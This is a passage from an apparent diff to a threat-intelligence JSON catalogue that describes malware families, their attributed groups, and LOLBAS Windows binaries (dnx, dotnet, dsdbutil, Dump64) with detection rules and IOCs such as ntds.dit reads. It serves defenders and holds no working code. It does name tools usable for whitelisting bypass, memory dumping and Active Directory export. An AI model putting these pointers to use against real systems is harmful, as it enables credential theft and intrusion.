[credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* IOC: Child process from diskshadow.exe[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5104", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "84346cb2-601a-45ff-9d88-f0516cfaa688", + "type": "similar" + } + ], + "uuid": "07c49566-5bea-44dc-b81f-e6c90bda9c39", + "value": "Diskshadow" + }, + { + "description": "[[Dnscmd.exe - LOLBAS Project](/references/3571ca9d-3388-4e74-8b30-dd92ef2b5f10)]", + "meta": { + "id": "3c1aab35-432c-49c8-b71b-0cc21694be8a", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3fd09997-86e0-4dce-935e-421863e9bad0", + "type": "similar" + } + ], + "uuid": "16a67a60-df5f-443e-b0f3-07254ce0b923", + "value": "Dnscmd.exe" + }, + { + "description": "Dnscmd is a Windows command-line utility used to manage DNS servers.[[Dnscmd Microsoft](/references/24b1cb7b-357f-470f-9715-fa0ec3958cbb)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5016", + "source": "Tidal Cyber", + "tags": [ + "a45f9597-09c4-4e70-a7d3-d8235d2451a3", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "16a67a60-df5f-443e-b0f3-07254ce0b923", + "type": "similar" + } + ], + "uuid": "3fd09997-86e0-4dce-935e-421863e9bad0", + "value": "Dnscmd" + }, + { + "description": "[DnsSystem](https://app.tidalcyber.com/software/e69a913d-4ddc-4d69-9961-25a31cae5899) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2022.[[Zscaler Lyceum DnsSystem June 2022](https://app.tidalcyber.com/references/eb78de14-8044-4466-8954-9ca44a17e895)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1021", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "8a2867f9-e8fc-4bf1-a860-ef6e46311900", + "type": "similar" + } + ], + "uuid": "e69a913d-4ddc-4d69-9961-25a31cae5899", + "value": "DnsSystem" + }, + { + "description": "[[dnx.exe - LOLBAS Project](/references/50652a27-c47b-41d4-a2eb-2ebf74e5bd09)]", + "meta": { + "id": "631a3049-8904-465c-944d-84be82c04bab", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "e2bdda2e-54b4-4d35-b7e5-4e20626a4481", + "type": "similar" + } + ], + "uuid": "2e252d44-c667-4570-950b-255c7f291f24", + "value": "dnx.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** .Net Execution environment file included with .Net.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* N/A\n\n**Resources:**\n* [https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/](https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dnx.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[dnx.exe - LOLBAS Project](/references/50652a27-c47b-41d4-a2eb-2ebf74e5bd09)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5215", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "2e252d44-c667-4570-950b-255c7f291f24", + "type": "similar" + } + ], + "uuid": "e2bdda2e-54b4-4d35-b7e5-4e20626a4481", + "value": "dnx" + }, + { + "description": "[DOGCALL](https://app.tidalcyber.com/software/81ce23c0-f505-4d75-9928-4fbd627d3bc2) is a backdoor used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. [[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0213", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "used-by" + }, + { + "dest-uuid": "0852567d-7958-4f4b-8947-4f840ec8d57d", + "type": "similar" + } + ], + "uuid": "81ce23c0-f505-4d75-9928-4fbd627d3bc2", + "value": "DOGCALL" + }, + { + "description": "[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)].", + "meta": { + "id": "2225ca1f-ef5e-4f0b-aa21-b1d48d1570f1" + }, + "related": [ + { + "dest-uuid": "dfa14314-3c64-4a10-9889-0423b884f7aa", + "type": "similar" + } + ], + "uuid": "83b39733-9672-4272-922f-7883d91ca94b", + "value": "Retefe" + }, + { + "description": "[Dok](https://app.tidalcyber.com/software/dfa14314-3c64-4a10-9889-0423b884f7aa) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9)).[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)][[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)][[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]", + "meta": { + "platforms": [ + "macOS" + ], + "software_attack_id": "S0281", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f36b2598-515f-4345-84e5-5ccde253edbe", + "type": "similar" + }, + { + "dest-uuid": "83b39733-9672-4272-922f-7883d91ca94b", + "type": "similar" + } + ], + "uuid": "dfa14314-3c64-4a10-9889-0423b884f7aa", + "value": "Dok" + }, + { + "description": "[Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) is a backdoor that uses a unique Dogecoin-based Domain Generation Algorithm and was first observed in July 2020. [Doki](https://app.tidalcyber.com/software/e6160c55-1868-47bd-bec6-7becbf236bbb) was used in conjunction with the [ngrok](https://app.tidalcyber.com/software/316ecd9d-ac0b-58c7-8083-5d9214c770f6) Mining Botnet in a campaign that targeted Docker servers in cloud platforms. [[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)]", + "meta": { + "platforms": [ + "Containers", + "Linux" + ], + "software_attack_id": "S0600", + "source": "MITRE", + "tags": [ + "efa33611-88a5-40ba-9bc4-3d85c6c8819b" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4f1c389e-a80e-4a3e-9b0e-9be8c91df64f", + "type": "similar" + } + ], + "uuid": "e6160c55-1868-47bd-bec6-7becbf236bbb", + "value": "Doki" + }, + { + "description": "[Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) is an open source framework used to generate position-independent shellcode.[[Donut Github](https://app.tidalcyber.com/references/5f28c41f-6903-4779-93d4-3de99e031b70)][[Introducing Donut](https://app.tidalcyber.com/references/8fd099c6-e002-44d0-8b7f-65f290a42c07)] [Donut](https://app.tidalcyber.com/software/40d25a38-91f4-4e07-bb97-8866bed8e44f) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.[[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0695", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "a7b5df47-73bb-4d47-b701-869f185633a6", + "type": "similar" + } + ], + "uuid": "40d25a38-91f4-4e07-bb97-8866bed8e44f", + "value": "Donut" + }, + { + "description": "[[Dotnet.exe - LOLBAS Project](/references/8abe21ad-88d1-4a5c-b79e-8216b4b06862)]", + "meta": { + "id": "ed161ce5-f9f8-489f-8c3c-3af96bfbcd6d", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1bcd9c93-0944-4671-ab01-cabc5ffe30bf", + "type": "similar" + } + ], + "uuid": "d9e30f26-11a6-48f5-bb26-d9b624b6b1d0", + "value": "Dotnet.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** dotnet.exe comes with .NET Framework\n\n**Author:** felamos\n\n**Paths:**\n* C:\\Program Files\\dotnet\\dotnet.exe\n\n**Resources:**\n* [https://twitter.com/_felamos/status/1204705548668555264](https://twitter.com/_felamos/status/1204705548668555264)\n* [https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc](https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc)\n* [https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/](https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/)\n* [https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/](https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dotnet.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: dotnet.exe spawned an unknown process[[Dotnet.exe - LOLBAS Project](/references/8abe21ad-88d1-4a5c-b79e-8216b4b06862)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5216", + "source": "Tidal Cyber", + "tags": [ + "09c24b93-bf06-4cbb-acb0-d7b9657a41dc", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d9e30f26-11a6-48f5-bb26-d9b624b6b1d0", + "type": "similar" + } + ], + "uuid": "1bcd9c93-0944-4671-ab01-cabc5ffe30bf", + "value": "Dotnet" + }, + { + "description": "", + "meta": { + "id": "ad65ca9c-9315-49a6-9c5b-de64bb988b1c" + }, + "related": [ + { + "dest-uuid": "f7b64b81-f9e7-46bf-8f63-6d7520da832c", + "type": "similar" + } + ], + "uuid": "48f30a38-0b80-45ad-9f80-d99c96c79cf4", + "value": "Delphacy" + }, + { + "description": "[Downdelph](https://app.tidalcyber.com/software/f7b64b81-f9e7-46bf-8f63-6d7520da832c) is a first-stage downloader written in Delphi that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) in rare instances between 2013 and 2015. [[ESET Sednit Part 3](https://app.tidalcyber.com/references/7c2be444-a947-49bc-b5f6-8f6bec870c6a)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0134", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "08d20cd2-f084-45ee-8558-fa6ef5a18519", + "type": "similar" + }, + { + "dest-uuid": "48f30a38-0b80-45ad-9f80-d99c96c79cf4", + "type": "similar" + } + ], + "uuid": "f7b64b81-f9e7-46bf-8f63-6d7520da832c", + "value": "Downdelph" + }, + { + "description": " [down_new](https://app.tidalcyber.com/software/20b796cf-6c90-4928-999e-88107078e15e) is a downloader that has been used by [BRONZE BUTLER](https://app.tidalcyber.com/groups/5825a840-5577-4ffc-a08d-3f48d64395cb) since at least 2019.[[Trend Micro Tick November 2019](https://app.tidalcyber.com/references/93adbf0d-5f5e-498e-aca1-ed3eb11561e7)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0472", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "8be7c69e-d8e3-4970-9668-61de08e508cc", + "type": "similar" + } + ], + "uuid": "20b796cf-6c90-4928-999e-88107078e15e", + "value": "down_new" + }, + { + "description": "[DownPaper](https://app.tidalcyber.com/software/fc433c9d-a7fe-4915-8aa0-06b58f288249) is a backdoor Trojan; its main functionality is to download and run second stage malware. [[ClearSky Charming Kitten Dec 2017](https://app.tidalcyber.com/references/23ab1ad2-e9d4-416a-926f-6220a59044ab)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0186", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "7a9d653c-8812-4b96-81d1-b0a27ca918b4", + "type": "used-by" + }, + { + "dest-uuid": "e48df773-7c95-4a4c-ba70-ea3d15900148", + "type": "similar" + } + ], + "uuid": "fc433c9d-a7fe-4915-8aa0-06b58f288249", + "value": "DownPaper" + }, + { + "description": "[DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) is a remote access tool (RAT) that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://app.tidalcyber.com/software/c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf) shares similarities with [Bankshot](https://app.tidalcyber.com/software/24b8471d-698f-48cc-b47a-8fbbaf28b293), which was used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) in 2017 to target the Turkish financial sector.[[ClearSky Lazarus Aug 2020](https://app.tidalcyber.com/references/2827e6e4-8163-47fb-9e22-b59e59cd338f)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0694", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "56aa3c82-ed40-4b5a-84bf-7231356d9e96", + "type": "similar" + } + ], + "uuid": "c6c79fc5-e4b1-4f6c-a71d-d22d699d5caf", + "value": "DRATzarus" + }, + { + "description": "[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)]", + "meta": { + "id": "350835f6-2aa1-47fa-8575-d07ffaf59c4d" + }, + "related": [ + { + "dest-uuid": "e3cd4405-b698-41d9-88e4-fff29e7a19e2", + "type": "similar" + } + ], + "uuid": "614ca144-20e8-4387-b723-4a5f3cd7164b", + "value": "Bugat v5" + }, + { + "description": "[Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) was created from the source code of the Bugat banking Trojan (also known as Cridex).[[Dell Dridex Oct 2015](https://app.tidalcyber.com/references/f81ce947-d875-4631-9709-b54c8b5d25bc)][[Kaspersky Dridex May 2017](https://app.tidalcyber.com/references/52c48bc3-2b53-4214-85c3-7e5dd036c969)][[Treasury EvilCorp Dec 2019](https://app.tidalcyber.com/references/074a52c4-26d9-4083-9349-c14e2639c1bc)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0384", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "b3220638-6682-4a4e-ab64-e7dc4202a3f1", + "type": "used-by" + }, + { + "dest-uuid": "f01e2711-4b48-4192-a2e8-5f56c945ca19", + "type": "similar" + }, + { + "dest-uuid": "614ca144-20e8-4387-b723-4a5f3cd7164b", + "type": "similar" + } + ], + "uuid": "e3cd4405-b698-41d9-88e4-fff29e7a19e2", + "value": "Dridex" + }, + { + "description": "[DropBook](https://app.tidalcyber.com/software/9c44d3f9-7a7b-4716-9cfa-640b36548ab0) is a Python-based backdoor compiled with PyInstaller.[[Cybereason Molerats Dec 2020](https://app.tidalcyber.com/references/81a10a4b-c66f-4526-882c-184436807e1d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0547", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "3ae6097d-d700-46c6-8b21-42fc0bcb48fa", + "type": "similar" + } + ], + "uuid": "9c44d3f9-7a7b-4716-9cfa-640b36548ab0", + "value": "DropBook" + }, + { + "description": "[Drovorub](https://app.tidalcyber.com/software/bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b) is a Linux malware toolset comprised of an agent, client, server, and kernel modules, that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5).[[NSA/FBI Drovorub August 2020](https://app.tidalcyber.com/references/d697a342-4100-4e6b-95b9-4ae3ba80924b)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0502", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59", + "1efd43ee-5752-49f2-99fe-e3441f126b00", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "99164b38-1775-40bc-b77b-a2373b14540a", + "type": "similar" + } + ], + "uuid": "bb7f7c19-ffb5-4bfe-99b1-ead3525c5e7b", + "value": "Drovorub" + }, + { + "description": "[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]", + "meta": { + "id": "ce37a7fa-5501-489f-8a20-c9ace5c9885c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9139c12f-a6d9-4300-8735-9298bc46a0bf", + "type": "similar" + } + ], + "uuid": "dc0ffa58-c5d3-4ea4-ab3f-4e9e75bc92b8", + "value": "dsdbutil.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.\n\n**Author:** Ekitji\n\n**Paths:**\n* C:\\Windows\\System32\\dsdbutil.exe\n* C:\\Windows\\SysWOW64\\dsdbutil.exe\n\n**Resources:**\n* [https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358](https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358)\n* [https://www.netwrix.com/ntds_dit_security_active_directory.html](https://www.netwrix.com/ntds_dit_security_active_directory.html)\n\n**Detection:**\n* IOC: Event ID 4688\n* IOC: dsdbutil.exe process creation\n* IOC: Event ID 4663\n* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit\n* IOC: Event ID 4656\n* IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit\n* Analysis: None Provided\n* Sigma: None Provided\n* Elastic: None Provided\n* Splunk: None Provided\n* BlockRule: None Provided[[dsdbutil.exe - LOLBAS Project](/references/fc982faf-a37d-4d0b-949c-f7a27adc3030)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5217", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "dc0ffa58-c5d3-4ea4-ab3f-4e9e75bc92b8", + "type": "similar" + } + ], + "uuid": "9139c12f-a6d9-4300-8735-9298bc46a0bf", + "value": "dsdbutil" + }, + { + "description": "", + "meta": { + "id": "6f9d2012-0617-4e81-8213-98e6e6998260" + }, + "related": [ + { + "dest-uuid": "06402bdc-a4a1-4e4a-bfc4-09f2c159af75", + "type": "similar" + } + ], + "uuid": "8e9c7640-e49f-42ea-b28f-a00e4019fb4c", + "value": "dsquery.exe" + }, + { + "description": "[dsquery](https://app.tidalcyber.com/software/06402bdc-a4a1-4e4a-bfc4-09f2c159af75) is a command-line utility that can be used to query Active Directory for information from a system within a domain. [[TechNet Dsquery](https://app.tidalcyber.com/references/bbbb4a45-2963-4f04-901a-fb2752800e12)] It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0105", + "source": "MITRE", + "tags": [ + "cb3d30b3-8cfc-4202-8615-58a9b8f7f118", + "cd1b5d44-226e-4405-8985-800492cf2865" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "b3061284-0335-4dcb-9f8e-a3b0412fd46f", + "type": "used-by" + }, + { + "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe", + "type": "similar" + }, + { + "dest-uuid": "8e9c7640-e49f-42ea-b28f-a00e4019fb4c", + "type": "similar" + } + ], + "uuid": "06402bdc-a4a1-4e4a-bfc4-09f2c159af75", + "value": "dsquery" + }, + { + "description": "[Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) is spyware that was discovered in 2019 and has been used against Indian financial institutions, research facilities, and the Kudankulam Nuclear Power Plant. [Dtrack](https://app.tidalcyber.com/software/aa21462d-9653-48eb-a82e-5c93c9db5f7a) shares similarities with the DarkSeoul campaign, which was attributed to [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08). [[Kaspersky Dtrack](https://app.tidalcyber.com/references/0122ee35-938d-493f-a3bb-bc75fc808f62)][[Securelist Dtrack](https://app.tidalcyber.com/references/49bd8841-a4b5-4ced-adfa-0ad0c8625ccd)][[Dragos WASSONITE](https://app.tidalcyber.com/references/39e6ab06-9f9f-4292-9034-b2f56064164d)][[CyberBit Dtrack](https://app.tidalcyber.com/references/1ac944f4-868c-4312-8b5d-1580fd6542a0)][[ZDNet Dtrack](https://app.tidalcyber.com/references/6e6e02da-b805-47d7-b410-343a1b5da042)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0567", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "f8774023-8021-4ece-9aca-383ac89d2759", + "type": "similar" + } + ], + "uuid": "aa21462d-9653-48eb-a82e-5c93c9db5f7a", + "value": "Dtrack" + }, + { + "description": "[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]", + "meta": { + "id": "a8818d86-a623-435b-a046-d2490b057b6c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "13482336-e22b-48e9-bd49-c6e6fc6612ec", + "type": "similar" + } + ], + "uuid": "cf43ff32-746a-44c9-9fbe-aa50b747f5a8", + "value": "Dump64.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Memory dump tool that comes with Microsoft Visual Studio\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\Installer\\Feedback\\dump64.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1460597833917251595](https://twitter.com/mrd0x/status/1460597833917251595)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_dump64.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml)\n* IOC: As a Windows SDK binary, execution on a system may be suspicious[[Dump64.exe - LOLBAS Project](/references/b0186447-a6d5-40d7-a11d-ab2e9fb93087)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5218", + "source": "Tidal Cyber", + "tags": [ + "0f09c7f5-ba57-4ef0-a196-e85558804496", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "cf43ff32-746a-44c9-9fbe-aa50b747f5a8", + "type": "similar" + } + ], + "uuid": "13482336-e22b-48e9-bd49-c6e6fc6612ec", + "value": "Dump64" + }, + { + "description": "[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]", + "meta": { + "id": "85c476ba-baf2-4777-ad2d-ebe673c5ec9b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "7f3bf76a-4e6a-45f1-a4bf-400d5a914e52", + "type": "similar" + } + ], + "uuid": "2aeee11b-2b25-4b93-ad2f-1bb60ac491a4", + "value": "DumpMinitool.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Dump tool part Visual Studio 2022\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\Extensions\\TestPlatform\\Extensions\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1511415432888131586](https://twitter.com/mrd0x/status/1511415432888131586)\n\n**Detection:**\n* Sigma: [proc_creation_win_dumpminitool_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml)\n* Sigma: 